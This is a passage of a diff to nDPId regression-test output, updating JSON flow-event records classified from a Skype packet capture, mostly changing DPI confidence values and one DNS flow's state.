00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969667439,"flow_last_seen":1431969689428,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.166","src_port":50049,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969663377,"flow_last_seen":1431969687753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":50044,"dst_port":40031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1116,7 +1116,7 @@ 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969689470,"flow_last_seen":1431969722520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969673443,"flow_last_seen":1431969701671,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":50053,"dst_port":40030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431969675950,"flow_last_seen":1431969702405,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63108,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969683498,"flow_last_seen":1431969716234,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50070,"dst_port":40018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969689470,"flow_last_seen":1431969717232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1137,46 +1137,46 @@ 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969789832,"flow_last_seen":1431969808350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"78.202.226.115","src_port":50144,"dst_port":29059,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969689470,"flow_last_seen":1431969716588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":92,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.26","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969663378,"flow_last_seen":1431969663378,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969666429,"flow_last_seen":1431969666429,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.47","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.37","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431969657367,"flow_last_seen":1431969688218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
